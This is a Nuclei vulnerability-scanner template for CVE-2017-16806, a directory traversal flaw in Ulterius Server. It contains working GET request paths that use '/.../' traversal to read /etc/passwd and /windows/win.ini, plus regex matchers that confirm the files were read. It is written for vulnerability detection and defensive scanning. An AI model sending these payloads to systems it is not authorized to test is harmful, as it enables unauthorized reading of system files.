nuclei-templates/http/cves/2017/CVE-2017-16806.yaml

45 lines
1.3 KiB
YAML

id: CVE-2017-16806
info:
name: Ulterius Server < 1.9.5.0 - Directory Traversal
author: geeknik
severity: high
description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
reference:
- https://www.exploit-db.com/exploits/43141
- https://nvd.nist.gov/vuln/detail/CVE-2017-16806
- https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
- https://www.exploit-db.com/exploits/43141/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-16806
cwe-id: CWE-22
epss-score: 0.07055
cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
epss-percentile: 0.93105
metadata:
max-request: 2
vendor: ulterius
product: ulterius_server
tags: cve2017,ulterius,traversal,edb,cve
http:
- method: GET
path:
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200